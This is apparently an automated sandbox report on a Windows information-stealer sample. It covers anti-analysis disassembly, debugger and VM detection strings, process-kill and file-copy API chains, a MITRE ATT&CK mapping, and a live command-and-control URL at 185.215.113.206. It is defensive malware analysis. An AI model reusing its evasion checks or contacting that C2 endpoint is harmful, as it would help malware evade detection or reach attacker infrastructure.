                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB599F second address: C93DA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F51207h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b jnp 00007F6074F511FEh 0x00000011 nop 0x00000012 call dword ptr [ebp+122D267Dh] 0x00000018 jnp 00007F6074F5120Ch 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F6074F51203h 0x00000026 ja 00007F6074F511F6h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE651B second address: CE6539 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F6074D9F9E6h 0x0000000d jmp 00007F6074D9F9EFh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6539 second address: CE6562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F6074F511FCh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6074F51204h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6562 second address: CE658D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F6074D9F9EFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jmp 00007F6074D9F9EBh 0x00000011 jo 00007F6074D9F9E6h 0x00000017 pop edi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE66F8 second address: CE6709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6074F511F6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6709 second address: CE6713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6074D9F9E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79E8D second address: D79EA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F52D60h 0x00000007 jnp 00007F6074F52D56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79A14 second address: D79A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79A19 second address: D79A20 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79A20 second address: D79A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnp 00007F6074F1C3E6h 0x0000000e jmp 00007F6074F1C3F0h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edi 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79A45 second address: D79A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79A4B second address: D79A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F6074F1C3E6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79A5A second address: D79A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8957E second address: D89582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89582 second address: D8959D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F52D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8959D second address: D895A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D895A2 second address: D895A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D884A1 second address: D884B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6074F1C3F1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D884B6 second address: D884BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88647 second address: D8866B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6074F1C3F4h 0x00000009 popad 0x0000000a jmp 00007F6074F1C3EBh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8866B second address: D8868D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6074F52D62h 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F6074F52D56h 0x00000010 jno 00007F6074F52D56h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8868D second address: D88691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88AB6 second address: D88ABB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88ABB second address: D88AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88AC7 second address: D88AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f push ecx 0x00000010 jc 00007F6074F52D56h 0x00000016 push edx 0x00000017 pop edx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88AE0 second address: D88AEA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6074F1C3ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C060 second address: D8C064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C064 second address: D8C06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C06A second address: D8C0E2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6074F52D58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F6074F52D58h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dh, 1Ah 0x00000029 push 00000004h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F6074F52D58h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 call 00007F6074F52D59h 0x0000004a jmp 00007F6074F52D61h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 push eax 0x00000056 pop eax 0x00000057 popad 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C0E2 second address: D8C106 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F1C3F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C106 second address: D8C124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jno 00007F6074F52D5Ch 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jl 00007F6074F52D60h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C124 second address: D8C13D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F6074F1C3E6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0505 second address: 53F0543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F52D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F6074F52D65h 0x00000013 xor ah, FFFFFFF6h 0x00000016 jmp 00007F6074F52D61h 0x0000001b popfd 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE3F8 second address: CAE3FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE3FC second address: CAE402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE402 second address: CAE40C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6074F1C3ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CA66D1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AFB59A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CCB65F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-38865
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_008240F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0081E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0081F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_008247C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00811710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00811710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0081DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00823B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00823B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00824B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00824B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0081EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0081BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0081DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00811160 GetSystemInfo,ExitProcess,0_2_00811160
                Source: file.exe, file.exe, 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2092013993.0000000001654000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2092013993.0000000001623000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37678
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37681
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37700
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37692
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37732
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37566
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00814610 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00829BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00829AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00827690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00829790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008298E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle
                Source: file.exe, file.exe, 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: C@Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00857588 cpuid
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00827D20
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00826BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008279E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00827BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.810000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.2050733563.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.810000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.2050733563.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK matrix (one row per line, cells separated by |; a leading number is the count of signatures mapped to that technique):

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 12 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 334 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                Source | Detection | Scanner | Label
                https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php | true | | unknown
                http://185.215.113.206/ | true | | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php/ | file.exe, 00000000.00000002.2092013993.000000000163D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.phpm%A | file.exe, 00000000.00000002.2092013993.0000000001636000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206 | file.exe, 00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.206/6c4adf523b719729.phpA%% | file.exe, 00000000.00000002.2092013993.0000000001636000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2050733563.000000000528B000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version: 41.0.0 Charoite
                Analysis ID: 1545325
                Start date and time: 2024-10-30 12:35:09 +01:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 2m 59s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed: 2
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: file.exe
                Detection: MAL
                Classification: mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 128
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: file.exe
                            No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                            No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
